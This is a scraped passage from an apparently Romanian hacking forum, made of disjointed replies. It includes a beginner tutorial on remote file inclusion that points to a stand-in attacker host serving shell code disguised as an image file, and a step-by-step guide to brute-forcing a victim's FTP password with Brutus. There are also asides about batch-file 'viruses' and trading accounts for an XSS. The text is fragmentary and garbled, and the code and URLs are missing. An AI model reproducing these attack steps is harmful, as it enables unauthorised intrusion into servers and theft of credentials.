curiosul

so, asta chiar ca ma sperie

Paxismul suna bine

Am scos la imprimanta 12 exemplare si tot nu am reusit; Cred ca este imposibil; De acord cu loki

AaAaa? Despre ce este vorba? aAaAa? Chiar nu m-am prins

) Tu ai modificat-o?

Tare tare astea, si ii faina si reclama originala ce mai....

si cam ce resurse ar cere ca sa stiu inainte sa-l descac...

e pa naiba

Parca azi era vorba sa inacepem...da nu vad pe nimeni care sa fi postat ceva pe site

Tehnica destul de celebra (RFI) , permite includerea mai multor arhive in alte servere ; majoritatea vulnerabilitatilor de genul asta se gasesc in coduri cum ar fi : Asta ar fi exploatat in modul urmator : Normal ar fi sa trimitem la o pagina care sa poata executa comenzile. Arhiva poate contine : Odata ce aveti arhiva cu codul , puneti o extensie .jpg sau .gif. Uploadati pe serverul victima , si totul este pregatit . Acum imaginativa ca avem adresa : http://atacant.com/xploitulnostru.gif . In xpl.gif trebuie sa fie unul din cele 3 coduri de mai sus . Fiecare cod din cele 3 foloseste o varianta distincta , pt ca unele servere pot bloca unele dintre ele . Acum faceti un url asa : victima.com: The Leading Personal Injury Site on the Net Si asta executa xploitul vostru , si primiti un fel de shell . Ce poti face cu asta ? Mai multe ... poti executa comanda cat de ex , si sa vezi arhive (de configurare de ex) , deasemenea puteti face cat in arhivele altor useri ("cd/home/gheorghe/public_html;") cat si "config.php" sau sa obtineti o lista de arhive ("cd/home/gheorghe/public_html;ls") Tutorialul nu este cine stie ce...este pentru incepatori... Si nu-mi asum responsabilitatea pentru contextul in care folositi tutorialul

)acuma am vazut..da io am primit tutorialul asta de la altcineva man Nu l-am luat de pe site la tine...pur si simplu mi-a dat acest trick..asta-i tot Ai putea sa verifici ip-urile de pe site la tine..ca n-am intrat niciodata decat azi...cand mi-ai dat llink-ul ala:P Si vorbeste si tu mai frumos omule fara coaie

Nu inteleg ce vrei sa spui si care ii problema ta ...

Pai asa este...dar este si asta o metoda...trebuie doar noroc cat incape Dar nu e chiar imposibil

Pentru a cracka un ftp , ai nevoie de : brutus ms-dos Metoda e putin cam lenta, insa sigura . Cum se face : -deschide cmd si scrie : ping www.adresa.com (si obtii ipul victimei) -acum deschideti brutus , si unde scrie FTP , puneti ipul pe care l-ati obtinut cand ati facut pingul (verificati ca ftpul e activ) -configurati brutus : target : ftp:victima.com type : ftp port : 21 connections : 34 timeout : 10 userid : victimaa passfile : biblioteca voastra de passuri -dupa ce ati configurat , dati start , si asteptati sa gaseasca passwordul. (poate dura ceva timp .... cu cat mai mare biblioteca ta , cu atat mai bine)

) chiar ca io prins cu mata-n sac

Pentru a obtine o imagine mai clara adaugati : Asadar ar arata cam asa : Cateodate filmuletele vin cu o parte din cod : asa ca adaugati doar ce lipseste : Sper sa fie de folos

Si daca pune parola nu o sa-l mai stearga?

Si cum se foloseste? Cu ce trebuie sa completez pe acolo...

.bat ...nui cine stie ce... Am creat cativa si vad ca toti "virusii" astea au aceeasi baza... .bat

Da, si sa stie limba romana...

Si eu conturi pe filelist, scenefz si atte trackere pt xss valid in yahoo...

Pare a fin fain site-ul..dau 3 conturi filelist pt cont/invitatie i play Conturi cu ratie peste 5

la 56 care ii problema? am dat click pe toate alea si n=au fost bune niciuna:(why?

vad ca nici nu tre sa mai facu puizzelul--dai click pe piesa aia si next level:P

Da la 3 ce tre sa faci de fapt? Sa modifici sursa sau sa pui in browser codul ala cu hiden:D Poate o sa reusesc sa-l fac si pe 3